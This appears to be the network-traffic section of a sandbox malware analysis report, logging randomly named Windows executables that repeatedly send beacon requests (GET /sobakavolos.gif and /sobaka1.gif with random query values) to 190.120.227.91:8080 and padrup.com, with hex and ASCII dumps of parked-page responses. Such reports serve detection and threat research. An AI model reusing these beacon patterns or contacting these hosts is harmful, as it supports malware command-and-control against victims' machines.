                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248302937 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE3OC44OTY2OmU1NjUyMGViM2YzYzBjYzc0YzlkMWMwNjJmMmQyZDcwNzZkY2FlOWVlM2M0OGFiMDA2MWRiMWZhNjRiNzA5ZWE6NjcxMjEwYmFkYWU0ZA==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248338938 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248414993 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 35 38 61 32 31 35 31 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                  Data Ascii: 14658a2151');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  31192.168.2.762527190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.281799078 CEST169OUTGET /sobakavolos.gif?1c6e18df=476977375 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  32192.168.2.762528185.53.178.50806152C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:44.093604088 CEST153OUTGET /sobaka1.gif?8dc219=65031855 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.318846941 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:45 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_CTHyzqhRLcqbooyFH02ibSJ+jpzB/qJaNMX6/b2Wwtpnxk1zH35mi8eZrS7mYg/7Utt61DNUoj/u3WOTsf3XJw==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.318953991 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE4NC44MTk6OWRhOGEyNDhmZjVlZGY5N2IxNzZmY2FmODZiY2VjY2JlMDZiZjM3ZmE0NDNmY2E5MGQzMzM3ZmM3Nzg1MGM3Mzo2NzEyMTBjMGM3ZjBh';var
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.318989992 CEST424INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                  Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.319067955 CEST336INData Raw: 0d 0a 31 34 32 0d 0a 32 62 35 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e
                                                                                                                                                                                                                                  Data Ascii: 1422b5');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.319226980 CEST336INData Raw: 0d 0a 31 34 32 0d 0a 32 62 35 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e
                                                                                                                                                                                                                                  Data Ascii: 1422b5');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  33192.168.2.762529190.120.227.9180806152C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.458210945 CEST166OUTGET /sobakavolos.gif?90f197=37996124 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  34192.168.2.762530185.53.178.50806152C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:54.243789911 CEST155OUTGET /sobaka1.gif?16eca60=240379840 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.329929113 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:55 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_tjbmutKlA1TUfIdMRYl30aiMN0rCcHVRf9AEsj+n+E+W1pAKE5v0yJYPwOk5pTVzjmJxyfYEwCEsBkEhw2v3Zg==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330001116 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE5NC45OTo0Y2M3NmJjYTg5N2I4ZjdhODAxZmM5MWZhNGNhMjhmMDUyYWQxMjU2NzM5OGRiZmFiOThhNGY0MWY1ZDBiNmM0OjY3MTIxMGNhZjFiMmU=';var
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330038071 CEST424INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                  Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330070972 CEST336INData Raw: 0d 0a 31 34 32 0d 0a 66 31 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e
                                                                                                                                                                                                                                  Data Ascii: 142f1d');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  35192.168.2.762531190.120.227.9180806152C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.388773918 CEST168OUTGET /sobakavolos.gif?1883db2=179941342 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  36192.168.2.762532185.53.178.50806152C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:04.099690914 CEST155OUTGET /sobaka1.gif?29e644c=439347960 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184223890 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:40:05 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_bOOmWBqELXlKN8YjEa1ZXqA74oiLLfNbY8mBdFMoL6Ti7K/v1PhVOCPSZgw7aFHEq7g9/hOmqz/32pFQBuNHRQ==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184310913 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzIwNC44MTk1OmJlNzE3ODRmZTA4MzUxZDcxYmFlM2Q4NDY1ZDQyMDA2NDM1NmM2M2I4Y2JmYmRmM2Q2NzZmZWNmMmM2Nzc1Yjc6NjcxMjEwZDRjODBmZA==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184323072 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184442043 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 31 37 65 64 33 39 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                  Data Ascii: 14617ed39d');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  37192.168.2.762533190.120.227.9180806152C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.202590942 CEST168OUTGET /sobakavolos.gif?2c177da=138700686 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  38192.168.2.762534185.53.178.50806152C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911405087 CEST154OUTGET /sobaka1.gif?3d9ecca=64613578 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013777018 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:40:14 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_glaMm5vgAXkKzCgz8TDXWZaP6PWVEk+VpcjneU0cVkX9Pi3IsQD4nRe21961dqequKEkxLpPuJ50peWGdWUtdw==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
